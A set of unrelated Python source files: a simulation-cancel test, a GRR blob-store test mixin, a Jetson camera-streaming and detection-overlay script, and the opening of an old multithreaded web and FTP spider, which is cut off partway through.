# -*- coding: utf-8 -*- u"""test cancel of sim with agent_start_delay :copyright: Copyright (c) 2020 RadiaSoft LLC. All Rights Reserved. :license: http://www.apache.org/licenses/LICENSE-2.0.html """ from __future__ import absolute_import, division, print_function import pytest _REPORT = 'heightWeightReport' def test_myapp(fc): from pykern import pkunit from pykern.pkdebug import pkdc, pkdp, pkdlog import threading import time d = fc.sr_sim_data() d.models.dog.favoriteTreat = 'agent_start_delay=5' x = dict( forceRun=False, models=d.models, report=_REPORT, simulationId=d.models.simulation.simulationId, simulationType=d.simulationType, ) t1 = threading.Thread(target=lambda: fc.sr_post('runSimulation', x)) t1.start() time.sleep(1) t2 = threading.Thread(target=lambda: fc.sr_post('runCancel', x)) t2.start() time.sleep(1) r = fc.sr_run_sim(d, _REPORT) pkdp('abc') p = r.get('plots') pkunit.pkok(p, 'expecting truthy r.plots={}', p)
blob_store_test_mixin.py
#!/usr/bin/env python """Mixin class to be used in tests for BlobStore implementations.""" from __future__ import absolute_import from __future__ import division from __future__ import unicode_literals import abc import threading import time from unittest import mock from grr_response_core.lib import rdfvalue from grr_response_server import blob_store from grr_response_server.databases import mysql_blobs from grr_response_server.rdfvalues import objects as rdf_objects from grr.test_lib import stats_test_lib from grr.test_lib import test_lib POSITIONAL_ARGS = 0 class BlobStoreTestMixin(stats_test_lib.StatsTestMixin, metaclass=abc.ABCMeta): """Mixin providing tests shared by all blob store tests implementations.""" @abc.abstractmethod def CreateBlobStore(self): """Create a test blob store. Returns: A tuple (blob_store, cleanup), where blob_store is an instance of blob_store.BlobStore to be tested and cleanup is a function which destroys blob_store, releasing any resources held by it. """ def setUp(self): super().setUp() bs, cleanup = self.CreateBlobStore() if cleanup is not None: self.addCleanup(cleanup) self.blob_store = blob_store.BlobStoreValidationWrapper(bs) def testCheckBlobsExistOnEmptyListReturnsEmptyDict(self): self.assertEqual(self.blob_store.CheckBlobsExist([]), {}) def testReadBlobsOnEmptyListReturnsEmptyDict(self): self.assertEqual(self.blob_store.ReadBlobs([]), {}) def testReadingNonExistentBlobReturnsNone(self): blob_id = rdf_objects.BlobID(b"01234567" * 4) result = self.blob_store.ReadBlob(blob_id) self.assertIsNone(result) def testReadingNonExistentBlobsReturnsNone(self): blob_id = rdf_objects.BlobID(b"01234567" * 4) result = self.blob_store.ReadBlobs([blob_id]) self.assertEqual(result, {blob_id: None}) def testSingleBlobCanBeWrittenAndThenRead(self): blob_id = rdf_objects.BlobID(b"01234567" * 4) blob_data = b"abcdef" self.blob_store.WriteBlobs({blob_id: blob_data}) result = self.blob_store.ReadBlob(blob_id) self.assertEqual(result, blob_data) def testMultipleBlobsCanBeWrittenAndThenRead(self): blob_ids = [rdf_objects.BlobID((b"%d1234567" % i) * 4) for i in range(10)] blob_data = [b"a" * i for i in range(10)] self.blob_store.WriteBlobs(dict(zip(blob_ids, blob_data))) result = self.blob_store.ReadBlobs(blob_ids) self.assertEqual(result, dict(zip(blob_ids, blob_data))) def testWriting80MbOfBlobsWithSingleCallWorks(self): num_blobs = 80 blob_ids = [ rdf_objects.BlobID((b"%02d234567" % i) * 4) for i in range(num_blobs) ] blob_data = [b"a" * 1024 * 1024] * num_blobs self.blob_store.WriteBlobs(dict(zip(blob_ids, blob_data))) result = self.blob_store.ReadBlobs(blob_ids) self.assertEqual(result, dict(zip(blob_ids, blob_data))) def testCheckBlobExistsReturnsFalseForMissing(self): blob_id = rdf_objects.BlobID(b"11111111" * 4) self.assertFalse(self.blob_store.CheckBlobExists(blob_id)) def testCheckBlobExistsReturnsTrueForExisting(self): blob_id = rdf_objects.BlobID(b"01234567" * 4) blob_data = b"abcdef" self.blob_store.WriteBlobs({blob_id: blob_data}) self.assertTrue(self.blob_store.CheckBlobExists(blob_id)) def testCheckBlobsExistCorrectlyReportsPresentAndMissingBlobs(self): blob_id = rdf_objects.BlobID(b"01234567" * 4) blob_data = b"abcdef" self.blob_store.WriteBlobs({blob_id: blob_data}) other_blob_id = rdf_objects.BlobID(b"abcdefgh" * 4) result = self.blob_store.CheckBlobsExist([blob_id, other_blob_id]) self.assertEqual(result, {blob_id: True, other_blob_id: False}) @mock.patch.object(mysql_blobs, "BLOB_CHUNK_SIZE", 1) def testLargeBlobsAreReassembledInCorrectOrder(self): blob_data = b"0123456789" blob_id = rdf_objects.BlobID(b"00234567" * 4) self.blob_store.WriteBlobs({blob_id: blob_data}) result = self.blob_store.ReadBlobs([blob_id]) self.assertEqual({blob_id: blob_data}, result) @mock.patch.object(mysql_blobs, "BLOB_CHUNK_SIZE", 3) def testNotEvenlyDivisibleBlobsAreReassembledCorrectly(self): blob_data = b"0123456789" blob_id = rdf_objects.BlobID(b"00234567" * 4) self.blob_store.WriteBlobs({blob_id: blob_data}) result = self.blob_store.ReadBlobs([blob_id]) self.assertEqual({blob_id: blob_data}, result) def testOverwritingExistingBlobDoesNotRaise(self): blob_id = rdf_objects.BlobID(b"01234567" * 4) blob_data = b"abcdef" for _ in range(2): self.blob_store.WriteBlobs({blob_id: blob_data}) @mock.patch.object(time, "sleep") def testReadAndWaitForBlobsWorksWithImmediateResults(self, sleep_mock): a_id = rdf_objects.BlobID(b"0" * 32) b_id = rdf_objects.BlobID(b"1" * 32) blobs = {a_id: b"aa", b_id: b"bb"} with mock.patch.object( self.blob_store, "ReadBlobs", return_value=blobs) as read_mock: results = self.blob_store.ReadAndWaitForBlobs( [a_id, b_id], timeout=rdfvalue.Duration.From(10, rdfvalue.SECONDS)) sleep_mock.assert_not_called() read_mock.assert_called_once() self.assertCountEqual(read_mock.call_args[POSITIONAL_ARGS][0], [a_id, b_id]) self.assertEqual({a_id: b"aa", b_id: b"bb"}, results) @mock.patch.object(time, "sleep") def testReadAndWaitForBlobsPollsUntilResultsAreAvailable(self, sleep_mock): a_id = rdf_objects.BlobID(b"0" * 32) b_id = rdf_objects.BlobID(b"1" * 32) effect = [{ a_id: None, b_id: None }, { a_id: b"aa", b_id: None }, { b_id: None }, { b_id: b"bb" }] with test_lib.FakeTime(rdfvalue.RDFDatetime.FromSecondsSinceEpoch(10)): with mock.patch.object( self.blob_store, "ReadBlobs", side_effect=effect) as read_mock: results = self.blob_store.ReadAndWaitForBlobs( [a_id, b_id], timeout=rdfvalue.Duration.From(10, rdfvalue.SECONDS)) self.assertEqual({a_id: b"aa", b_id: b"bb"}, results) self.assertEqual(read_mock.call_count, 4) self.assertCountEqual(read_mock.call_args_list[0][POSITIONAL_ARGS][0], [a_id, b_id]) self.assertCountEqual(read_mock.call_args_list[1][POSITIONAL_ARGS][0], [a_id, b_id]) self.assertCountEqual(read_mock.call_args_list[2][POSITIONAL_ARGS][0], [b_id]) self.assertCountEqual(read_mock.call_args_list[3][POSITIONAL_ARGS][0], [b_id]) self.assertEqual(sleep_mock.call_count, 3) def testReadAndWaitForBlobsStopsAfterTimeout(self): a_id = rdf_objects.BlobID(b"0" * 32) b_id = rdf_objects.BlobID(b"1" * 32) effect = [{a_id: b"aa", b_id: None}] + [{b_id: None}] * 3 time_mock = test_lib.FakeTime(10) sleep_call_count = [0] def sleep(secs): time_mock.time += secs sleep_call_count[0] += 1 with time_mock, mock.patch.object(time, "sleep", sleep): with mock.patch.object( self.blob_store, "ReadBlobs", side_effect=effect) as read_mock: results = self.blob_store.ReadAndWaitForBlobs( [a_id, b_id], timeout=rdfvalue.Duration.From(3, rdfvalue.SECONDS)) self.assertEqual({a_id: b"aa", b_id: None}, results) self.assertGreaterEqual(read_mock.call_count, 3) self.assertCountEqual(read_mock.call_args_list[0][POSITIONAL_ARGS][0], [a_id, b_id]) for i in range(1, read_mock.call_count): self.assertCountEqual(read_mock.call_args_list[i][POSITIONAL_ARGS][0], [b_id]) self.assertEqual(read_mock.call_count, sleep_call_count[0] + 1) @mock.patch.object(time, "sleep") def testReadAndWaitForBlobsPopulatesStats(self, sleep_mock): a_id = rdf_objects.BlobID(b"0" * 32) b_id = rdf_objects.BlobID(b"1" * 32) blobs = {a_id: b"aa", b_id: b"bb"} with mock.patch.object(self.blob_store, "ReadBlobs", return_value=blobs): with self.assertStatsCounterDelta(2, blob_store.BLOB_STORE_POLL_HIT_LATENCY): with self.assertStatsCounterDelta( 2, blob_store.BLOB_STORE_POLL_HIT_ITERATION): self.blob_store.ReadAndWaitForBlobs([a_id, b_id], timeout=rdfvalue.Duration.From( 10, rdfvalue.SECONDS)) def testWaitForBlobsDoesNotWaitIfBlobsAreAlreadyPresent(self): timeout = rdfvalue.Duration.From(0, rdfvalue.SECONDS) blobs = [b"foo", b"bar", b"baz"] blob_ids = self.blob_store.WriteBlobsWithUnknownHashes(blobs) # This should not throw anything. self.blob_store.WaitForBlobs(blob_ids, timeout=timeout) self.assertCountEqual(self.blob_store.ReadBlobs(blob_ids).values(), blobs) def testWaitForBlobsRaisesIfTimeoutIsZeroAndBlobsAreNotPresent(self): timeout = rdfvalue.Duration.From(0, rdfvalue.SECONDS) blob_ids = [ rdf_objects.BlobID.FromBlobData(b"foo"), rdf_objects.BlobID.FromBlobData(b"bar"), rdf_objects.BlobID.FromBlobData(b"baz"), ] with self.assertRaises(blob_store.BlobStoreTimeoutError): self.blob_store.WaitForBlobs(blob_ids, timeout=timeout) def testWaitForBlobsWaitsIfBlobsAreNotAvailableImmediately(self): timeout = rdfvalue.Duration.From(5, rdfvalue.SECONDS) foo_blob = b"foo" bar_blob = b"bar" blob_ids = [ rdf_objects.BlobID.FromBlobData(foo_blob), rdf_objects.BlobID.FromBlobData(bar_blob), ] wait = lambda: self.blob_store.WaitForBlobs(blob_ids, timeout=timeout) with test_lib.FakeTimeline(threading.Thread(target=wait)) as timeline: # No blobs are in the database, should wait. timeline.Run(rdfvalue.Duration.From(1, rdfvalue.SECONDS)) self.blob_store.WriteBlobWithUnknownHash(foo_blob) # Only one blob is in the database, should wait. timeline.Run(rdfvalue.Duration.From(1, rdfvalue.SECONDS)) self.blob_store.WriteBlobWithUnknownHash(bar_blob) # All requested blobs are in the database, should finish. timeline.Run(rdfvalue.Duration.From(5, rdfvalue.SECONDS)) blobs = self.blob_store.ReadBlobs(blob_ids).values() self.assertCountEqual(blobs, [foo_blob, bar_blob]) def testWaitForBlobsRaisesIfNonZeroTimeoutIsReached(self): timeout = rdfvalue.Duration.From(5, rdfvalue.SECONDS) foo_blob = b"foo" bar_blob = b"bar" blob_ids = [ rdf_objects.BlobID.FromBlobData(foo_blob), rdf_objects.BlobID.FromBlobData(bar_blob), ] wait = lambda: self.blob_store.WaitForBlobs(blob_ids, timeout=timeout) with test_lib.FakeTimeline(threading.Thread(target=wait)) as timeline: # No blobs are in the database, should wait. timeline.Run(rdfvalue.Duration.From(1, rdfvalue.SECONDS)) self.blob_store.WriteBlobWithUnknownHash(foo_blob) # There is still one blob missing, if should raise if we run for 1 minute. with self.assertRaises(blob_store.BlobStoreTimeoutError): timeline.Run(rdfvalue.Duration.From(1, rdfvalue.MINUTES)) def testWaitForBlobsUpdatesStats(self): latency = blob_store.BLOB_STORE_POLL_HIT_LATENCY iteration = blob_store.BLOB_STORE_POLL_HIT_ITERATION timeout = rdfvalue.Duration.From(10, rdfvalue.SECONDS) foo_blob = b"foo" bar_blob = b"bar" baz_blob = b"baz" blob_ids = [ rdf_objects.BlobID.FromBlobData(foo_blob), rdf_objects.BlobID.FromBlobData(bar_blob), rdf_objects.BlobID.FromBlobData(baz_blob), ] wait = lambda: self.blob_store.WaitForBlobs(blob_ids, timeout=timeout) with test_lib.FakeTimeline(threading.Thread(target=wait)) as timeline: # No blobs at the beginning, so no events should be recorded. with self.assertStatsCounterDelta(0, latency): with self.assertStatsCounterDelta(0, iteration): timeline.Run(rdfvalue.Duration.From(2, rdfvalue.SECONDS)) self.blob_store.WriteBlobWithUnknownHash(foo_blob) self.blob_store.WriteBlobWithUnknownHash(bar_blob) # Two blobs are written and should be picked up. with self.assertStatsCounterDelta(2, latency): with self.assertStatsCounterDelta(2, iteration): timeline.Run(rdfvalue.Duration.From(3, rdfvalue.SECONDS)) self.blob_store.WriteBlobWithUnknownHash(baz_blob) # Last blob is written and should be picked up. with self.assertStatsCounterDelta(1, latency): with self.assertStatsCounterDelta(1, iteration): timeline.Run(rdfvalue.Duration.From(1, rdfvalue.SECONDS))
testH264_Jetson.py
import os import io import time import multiprocessing as mp from queue import Empty from PIL import Image from http import server import socketserver import numpy as np import cv2 import urllib.request Ncams = 1 streamsVideo = ('http://192.168.0.20:8000', 'http://192.168.0.20:8000', 'http://192.168.0.20:8000','http://192.168.0.20:8000', 'rtsp://admin:12345@192.168.0.200/mpeg4') streamsRects = ('http://192.168.0.20:8000/data.html', 'http://192.168.0.20:8000/data.html', 'http://192.168.0.20:8000/data.html', 'http://192.168.0.20:8000/data.html') class objRect: def __init__(self, rect=None, side=None): if rect: self.x0 = rect[0] self.x1 = rect[1] self.y0 = rect[2] self.y1 = rect[3] else: self.x0 = 0 self.x1 = 0 self.y0 = 0 self.y1 = 0 if side: self.side = side else: self.side = 0 #0 = right cam, 1 = front cam, 2 = left cam, 3 = back cam def area(self): return (abs(self.x1-self.x0)*abs(self.y1-self.y0)) def rect(self): return (self.x0, self.x1, self.y0, self.y1) def center(self): return (self.x1-self.x0, self.y1-self.y0) def height(self): return abs(self.y1-self.y0) def width(self): return abs(self.x1-self.x0) def setrect(self, rect): self.x0 = rect[0] self.x1 = rect[1] self.y0 = rect[2] self.y1 = rect[3] def copy(self): return objRect(self.rect(), self.side) PAGE="""\ <html> <head> <title>Jetson TX2 image proccessing output</title> </head> <body> <center><h1>Joined image</h1></center> <center><img src="stream.mjpg" width="1740" height="740" /></center> </body> </html> """ class StreamingHandler(server.BaseHTTPRequestHandler): def do_GET(self): global cap if self.path == '/': self.send_response(301) self.send_header('Location', '/index.html') self.end_headers() elif self.path == '/index.html': stri = PAGE content = stri.encode('utf-8') self.send_response(200) self.send_header('Content-Type', 'text/html') self.send_header('Content-Length', len(content)) self.end_headers() self.wfile.write(content) elif self.path == '/stream.mjpg': self.send_response(200) self.send_header('Age', 0) self.send_header('Cache-Control', 'no-cache, private') self.send_header('Pragma', 'no-cache') self.send_header('Content-Type', 'multipart/x-mixed-replace; boundary=FRAME') self.end_headers() try: while True: if not self.server.Queue.empty(): frame = self.server.Queue.get(False) ret, buf = cv2.imencode('.jpg', frame) frame = np.array(buf).tostring() self.wfile.write(b'--FRAME\r\n') self.send_header('Content-Type', 'image/jpeg') self.send_header('Content-Length', len(frame)) self.end_headers() self.wfile.write(frame) self.wfile.write(b'\r\r') except Exception as e: logging.warning('Removed streaming client %s: %s', self.client_address, str(e)) else: self.send_error(404) self.end_headers() class StreamingServer(socketserver.ThreadingMixIn, server.HTTPServer): allow_reuse_address = True daemon_threads = True def cam_reader(cam, queueoutVideo, queueinRect, stop): cap = cv2.VideoCapture(streamsVideo[cam]) objdata = [] no_detect_cnt = 0 while cap: if stop.is_set(): cap.release() break ret, frame = cap.read() if not ret: pass # print(frame.shape) if no_detect_cnt >= 25: objdata = [] else: no_detect_cnt += 1 if not queueinRect.empty(): no_detect_cnt = 0 objdata = queueinRect.get(False) for obj in objdata: [x0, y0, x1, y1] = obj['objcoord'] x0 = int(x0*frame.shape[1]) x1 = int(x1*frame.shape[1]) y0 = int(y0*frame.shape[0]) y1 = int(y1*frame.shape[0]) frame = cv2.rectangle(frame, (x0,y0),(x1,y1), color=(0,255,0), thickness=3) frame = cv2.putText(frame, 'ID = {0:d}'.format(obj['objtype']), (x0+6,y1-6), cv2.FONT_HERSHEY_DUPLEX, 0.8, (255,0,0), 2) if not queueoutVideo.full(): queueoutVideo.put((cam, frame)) def main_cam_reader(queueoutVideo, queueinRect, stop): cap = cv2.VideoCapture(streamsVideo[-1]) objdata = [] no_detect_cnt = 0 while cap: if stop.is_set(): cap.release() break ret, frame = cap.read() if not ret: pass # print(frame.shape) frame = cv2.resize(frame, (864, 486)) if no_detect_cnt >= 25: objdata = [] else: no_detect_cnt += 1 if not queueinRect.empty(): no_detect_cnt = 0 objdata = queueinRect.get(False) for obj in objdata: [x0, y0, x1, y1] = obj['objcoord'] x0 = int(x0*frame.shape[1]) x1 = int(x1*frame.shape[1]) y0 = int(y0*frame.shape[0]) y1 = int(y1*frame.shape[0]) frame = cv2.rectangle(frame, (x0,y0),(x1,y1), color=(0,255,0), thickness=3) frame = cv2.putText(frame, 'ID = {0:d}'.format(obj['objtype']), (x0+6,y1-6), cv2.FONT_HERSHEY_DUPLEX, 0.8, (255,0,0), 2) if not queueoutVideo.full(): queueoutVideo.put((4, frame)) def RecognRect(cam, queueout, objsRectqueue, stop): dataresp = '' addr = streamsRects[cam] while not stop.is_set(): try: response = urllib.request.urlopen(addr) dataresp += response.read().decode('utf-8') a = dataresp.find('ffffd9') b = dataresp.find('ffaaee') if a != -1 and b != -1: if b > (a+6): str = dataresp[a+6:b] strlist = str.split('\n') objdata = [] objrects = [] #obj = {'objcoord':[0,0,0,0], 'objtype':0} strr='' for i in range(len(strlist)-1): stri = strlist[i] temp = re.findall(r'\d+', stri) objtype = int(temp[-1]) temp = re.findall(r'\d+\.\d*', stri) objcoord = map(float, temp) objdata.append({'objcoord':objcoord, 'objtype':objtype}) objrects.append(objRect(objcoord, cam)) if objrects and not objsRectqueue.full(): objsRectqueue.put(objrects) if objdata and queueout.empty(): queueout.put(objdata) dataresp = dataresp[b+6:] except: pass time.sleep(0.2) def concat_frames(queueinVideo, queueout, stop): #logoImg = cv2.imread('time_replacer.png') frame_width = (420, 420, 420, 420, 864) frame_height = (234, 234, 234, 234, 486) HorGap = 20 VerGap = 20 big_frame = np.zeros((VerGap+frame_height[0]+frame_height[-1], 3*HorGap+4*frame_width[0], 3), np.uint8) big_frame[:] = (39, 27, 23) frame_coord_x = (0, frame_width[0]+HorGap, (frame_width[0]+HorGap)*2, (frame_width[0]+HorGap)*3, 0) frame_coord_y = (0, 0, 0, 0, frame_height[0] + VerGap) gs_pipeline = 'appsrc ! videoconvert ! omxh264enc control-rate=2 bitrate=1000000 ! ' \ 'video/x-h264, stream-format=(string)byte-stream ! h264parse ! ' \ 'rtph264pay mtu=1400 ! udpsink host=192.168.0.16 port=8001 sync=false async=false' vidstreader = cv2.VideoWriter(gs_pipeline, 0, 15/1, (big_frame.shape[1],big_frame.shape[0]), True) print(vidstreader) while not stop.is_set(): if not queueinVideo.empty(): (cam, frame) = queueinVideo.get(False) #big_frame[0:234, cam*420:(cam+1)*420, :] = frame big_frame[frame_coord_y[cam]:frame_coord_y[cam]+frame_height[cam], frame_coord_x[cam]:frame_coord_x[cam]+frame_width[cam]] = frame vidstreader.write(big_frame) #print(big_frame.shape) #if queueout.empty(): # queueout.put(big_frame) vidstreader.release() def server_start(port, queue, stop): try: address = ('', port) server = StreamingServer(address, StreamingHandler) server.Queue = queueServer print('Server is running...') server.serve_forever() except (KeyboardInterrupt, SystemExit): stop.set() if __name__ == '__main__': queueServer = mp.Queue(1) queueFrames = mp.Queue(5) queueGlobRecognRects = mp.Queue(10) StopFlag = mp.Event() queueRects = [] procsDetectRects = [] procsCamStream = [] for cam in range(Ncams): queueRects.append(mp.Queue(1)) procsDetectRects.append(mp.Process(target=RecognRect, args=(cam, queueRects[cam], queueGlobRecognRects, StopFlag))) procsCamStream.append(mp.Process(target=cam_reader, args=(cam, queueFrames, queueRects[cam], StopFlag))) queueRects.append(mp.Queue(1)) procMainCamStream = mp.Process(target=main_cam_reader, args=(queueFrames, queueRects[-1], StopFlag)) ConcatProc = mp.Process(target=concat_frames, args=(queueFrames, queueServer, StopFlag)) ServerProc = mp.Process(target=server_start, args=(8000, queueServer, StopFlag)) st = time.time() ConcatProc.start() ServerProc.start() for cam in range(Ncams): procsCamStream[cam].start() procsDetectRects[cam].start() procMainCamStream.start() while True: if StopFlag.is_set(): StopFlag.set() time.sleep(0.1) for cam in range(Ncams): procsCamStream[cam].terminate() procsDetectRects[cam].terminate() procMainCamStream.terminate() ConcatProc.terminate() ServerProc.terminate() break time.sleep(1) exit(0)
spider.py
#!/usr/bin/env python from __future__ import generators ## Copyright (c) 1999 - 2003 L. C. Rees. All rights reserved. ## See COPYRIGHT file for license terms. __name__ = 'spider' __version__ = '0.5' __author__ = 'L.C. Rees (xanimal@users.sf.net)' __all__ = ['ftpurls', 'ftppaths', 'weburls', 'ftpmirror', 'ftpspider', 'webpaths', 'webreport', 'webmirror', 'webspider', 'urlreport', 'badurlreport', 'badhtmreport', 'redireport', 'outreport', 'othereport'] '''Multithreaded crawling, reporting, and mirroring for Web and FTP.''' class Spider: '''HTTP and FTP crawling, reporting, and checking''' import os as _os import urllib as _ulib import urlparse as _uparse from os import path as _path from ftplib import FTP as _ftp from time import strftime as _formtime from time import localtime as _localtime from ftplib import error_perm as _ftperr from sgmllib import SGMLParseError as _sperror from robotparser import RobotFileParser as _rparser # Use threads if available try: from threading import Thread as _thread except ImportError: pass _bdsig, _bfsig, _session, _newparser = None, None, None, None # HTML tags with URLs _urltags = {'a':1, 'img':1, 'link':1, 'script':1, 'iframe':1, 'object':1, 'embed':1, 'area':1, 'frame':1, 'applet':1, 'input':1, 'base':1, 'div':1, 'layer':1, 'ilayer':1, 'bgsound':1} # Supported protocols _supported = {'HTTP':1, 'http':1, 'HTTPS':1, 'https':1, 'FTP':1, 'ftp':1} # HTML attributes with URLs _urlattrs = {'href':1, 'src':1, 'data':1} def __init__(self, base=None, width=None, depth=None): '''Initializes a Spider instance and its base attributes Arguments: base -- URL to crawl (default: None) width -- maximum resources to crawl (default: None) depth -- how deep in a hierarchy to crawl (default: None)''' if base: self.base = base else: self.base = None if width: self.width = width else: self.width = None if depth: self.depth = depth else: self.depth = None def _ftpopen(self, base, name='anonymous', password=None, attempts=3): '''Returns FTP client session Arguments: base -- FTP server URL name -- login name (default: 'anonymous') password -- login password (default: None) attempts -- number of login attempts to try (default: 3)''' def ftpprompt(tries=0): '''Prompts for FTP username and password Arguments: tries -- number of login attempts''' tries += tries try: self._name = raw_input('Enter login name: ') self._password = raw_input('Enter password: ') session = ftp(base, self._name, self._password) return session # If login attempt fails, retry login except ftperr: if attempts >= tries: session = ftpprompt(tries) return session # Too many login attempts? End program elif attempts <= tries: raise IOError, 'Permission denied.' import sys sys.exit(0) # Assignments self._name, self._password, ftperr = name, password, self._ftperr su, ftp = self._uparse.urlsplit(base), self._ftp # Set URL, path, and strip 'ftp://' off base, path = su[1], '/'.join([su[2], '']) try: session = ftp(base, name, password) # Prompt for username, password if initial arguments are incorrect except ftperr: session = ftpprompt() # Change to remote path if it exits if path: session.cwd(path) return session def ftpmirror(self, l, t=None, b=None, w=200, d=6, n='anonymous', p=None): '''Mirrors an FTP site on a local filesystem Arguments: l -- local filesystem path (default: None) b -- FTP server URL (default: None) t -- number of download threads (default: None) w -- maximum amount of resources to crawl (default: 200) d -- depth in hierarchy to crawl (default: 6) n -- login username (default: 'anonymous') p -- login password (default: None)''' if b: self.ftpspider(b, w, d, n, p) return self._mirror((self.paths, self.urls), l, t) def ftppaths(self, b=None, w=200, d=6, n='anonymous', p=None): '''Returns a list of FTP paths. Arguments: b -- FTP server URL (default: None) w -- maximum amount of resources to crawl (default: 200) d -- depth in hierarchy to crawl (default: 6) n -- login username (default: 'anonymous') p -- login password (default: None)''' def sortftp(rdir): '''Returns a list of entries marked as files or directories Arguments: rdir -- remote directory list''' rlist = [] rappend = rlist.append for rl in rdir: # Split remote file based on whitespace ri = rl.split()[-1] # Add tuple of remote item type, permissions & name to rlist if ri not in ('.', '..'): rappend((rl[0], rl[7], ri)) return rlist def visitftp(): '''Extracts contents of an FTP directory''' wd = pwd() if wd[-1] != '/': wd = '/'.join([wd, '']) # Add present working directory to visited directories dirs[wd], rlist = None, [] # Get list of current directory's contents retr('LIST -a', rlist.append) for url in sortftp(rlist): # Test if remote item is a file (indicated by '-') if url[0] == '-': # Resolve path of file purl = ''.join([wd, url[2]]) # Ensure file list don't exceed max number of resources if len(files) >= width: return None # Add files to file dictionary elif purl not in files: files[purl] = None # Test if it's a directory ('d') and allows scanning ('-') elif url[0] == 'd': if url[1] != '-': # Resolve path of directory purl = ''.join([wd, url[2], '/']) # Ensure no recursion beyond depth allowed if len(purl.split('/')) >= depth: dirs[purl] = None # Visit directory if it hasn't been visited yet elif purl not in dirs: # Change to new directory cwd(purl) # Run 'visitftp' on new directory visitftp() # Use classwide attributes if set if b: self.base = b else: b = self.base # Use classwide width if different from method default if self.width and w == 200: width = self.width else: width = w # Use classwide depth if different from method default if self.depth and d == 6: depth = self.depth + 1 else: depth = d + 1 # File and directory dicts files, dirs = {}, {} # Use existing FTP client session if present if self._session: ftp = self._session # Create new FTP client session if necessary else: ftp = self._ftpopen(b, n, p) self._session = ftp # Avoid outside namespace lookups cwd, pwd, retr = ftp.cwd, ftp.pwd, ftp.retrlines # Walk FTP site visitftp() # Make path list out of files' keys and return it self.paths = files.keys() self.paths.sort() return self.paths def ftpspider(self, b=None, w=200, d=6, n='anonymous', p=None): '''Returns lists of URLs and paths plus a live FTP client session Arguments: b -- FTP server URL (default: None) w -- maximum amount of resources to crawl (default: 200) d -- depth in hierarchy to crawl (default: 6) n -- login username (default: 'anonymous') p -- login password (default: None)''' if b: ftppaths(b, w, d, n, p) return self.paths, ftpurls(), self._session def ftpurls(self, b=None, w=200, d=6, n='anonymous', p=None): '''Returns a list of FTP URLs Arguments: b -- FTP server URL (default: None) w -- maximum amount of resources to crawl (default: 200) d -- depth in hierarchy to crawl (default: 6) n -- login username (default: 'anonymous') p -- login password (default: None)''' if b: ftppaths(b, w, d, n, p) # Get rid of trailing '/' in base if present before joining if b[-1] == '/': base = b[:-1] else: base = self.base # Get rid of trailing '/' in base if present before joining if base[-1] == '/': base = self.base[:-1] paths = self.paths # Add FTP URL self.urls = [''.join([base, i]) for i in paths] return self.urls def _parserpick(self, old=None): '''Returns a class using the sgmllib parser or the sgmlop parser Arguments: old -- use classic sgmllib SGMLParser''' # Assignments urltags, urlattrs = self._urltags, self._urlattrs # Lists for bad file and bad directory signatures self._bfsig, self._bdsig = [], [] bfsig, bdsig = self._bfsig, self._bdsig # Use faster SGMLParser if available try: from sgmlop import SGMLParser as newparser self._newparser = newparser # If unavailable, use classic SGML parser except ImportError: from sgmllib import SGMLParser as oldparser old = 1 # Classes using classic sgmllib SGML Parser if old: from sgmllib import SGMLParser as oldparser # Remove sgmlop parser if present self._newparser = None # UrlExtract class using classic parser class UrlExtract(oldparser): '''Extracts URLs from a SGMLish document''' def reset(self): '''Resets SGML parser and clears lists''' oldparser.reset(self) self.urls, self.text, self.badurl = [], [], None def handle_data(self, data): '''Handles non-markup data''' # Get first 5 lines of non-markup data if len(self.text) <= 5: self.text.append(data) # Compare signature of known bad URL to a new web page if self.text == bfsig: self.badurl = 1 elif self.text == bdsig: self.badurl = 1 def finish_starttag(self, tag, attrs): '''Extracts URL bearing tags''' if tag in urltags: # Get key, vale in attributes if they match url = [v for k, v in attrs if k in urlattrs] if url: self.urls.extend(url) # BadUrl class using classic parser class BadUrl(oldparser): '''Collects results of intentionally incorrect URLs''' def reset(self): '''Resets SGML parser and clears lists''' oldparser.reset(self) self.text = [] def handle_data(self, data): '''Collects lines to profile bad URLs''' # Adds first 5 lines of non-markup data to text if len(self.text) <= 5: self.text.append(data) # If no old flag, use SGMLParser from sgmlop and related classes else: # UrlExtract class using sgmlop parser class UrlExtract: '''Extracts URLs from a SGMLish document''' def __init__(self): '''Resets SGML parser and clears lists''' self.urls, self.text, self.badurl = [], [], None def handle_data(self, data): '''Handles non-markup data''' # Get first 5 lines of non-markup data if len(self.text) <= 5: self.text.append(data) # Compare signature of known bad URL to a new web page if self.text == bfsig: self.badurl = 1 elif self.text == bdsig: self.badurl = 1 def finish_starttag(self, tag, attrs): '''Extracts URL bearing tags''' if tag in urltags: # Get key, vale in attributes if they match url = [v for k, v in attrs if k in urlattrs] if url: self.urls.extend(url) # BadUrl class using sgmlop parser class BadUrl: '''Collects results of intentionally incorrect URLs''' def __init__(self): '''Resets SGML parser and clears lists''' self.text = [] def handle_data(self, data): '''Collects lines to profile not found responses''' # Adds first 5 lines of non-markup data to list 'text' if len(self.text) <= 5: self.text.append(data) # Make resulting classes available class wide self._UrlExtract, self._BadUrl = UrlExtract, BadUrl def _webtest(self): '''Generates signatures for identifying bad URLs''' def badurl(url): '''Returns first 5 lines of a bad URL Arguments: url -- Bad URL to open and parse''' # Use different classes if faster SGML Parser is available if self._newparser: # sgmlop parser must have a handler passed to it parser, urlget = self._newparser(), BadUrl() # Pass handler (sgmlop cannot be subclassed) parser.register(urlget) parser.feed(urlopen(url).read()) parser.close() # Use classic parser else: urlget = BadUrl() urlget.feed(urlopen(url).read()) urlget.close() # Return singature of bad URL return urlget.text # Make globals local base, urljoin = self.base, self._uparse.urljoin urlopen, BadUrl = self._ulib.urlopen, self._BadUrl # Generate random string of jibber from string import letters, digits from random import choice, randint jibber = ''.join([letters, digits]) ru = ''.join([choice(jibber) for x in range(randint(1, 30))]) # Builds signature of a bad URL for a file self._bfsig.extend(badurl(urljoin(base, '%s.html' % ru))) # Builds signature of a bad URL for a directory self._bdsig.extend(badurl(urljoin(base,'%s/' % ru))) def _webparser(self, html): '''Parses HTML and returns bad URL indicator and extracted URLs Arguments: html -- HTML data''' # Use different classes if faster SGML Parser is available if self._newparser: # Make instances of SGML parser and URL extracting handler parser, urlget = self._newparser(), self._UrlExtract() # Pass handler to parser parser.register(urlget) # Feed data to parser parser.feed(html) parser.close() # Return bad URL indicator and extracted URLs else: urlget = self._UrlExtract() urlget.feed(html) urlget.close() # Return badurl marker and list of child URLS return urlget.badurl, urlget.urls def _webopen(self, base): '''Verifies URL and returns actual URL and extracted child URLs Arguments: base -- tuple containing a URL and its referring URL''' # Assignments good, cbase = self._good, base[0] try: # If webspiders can access 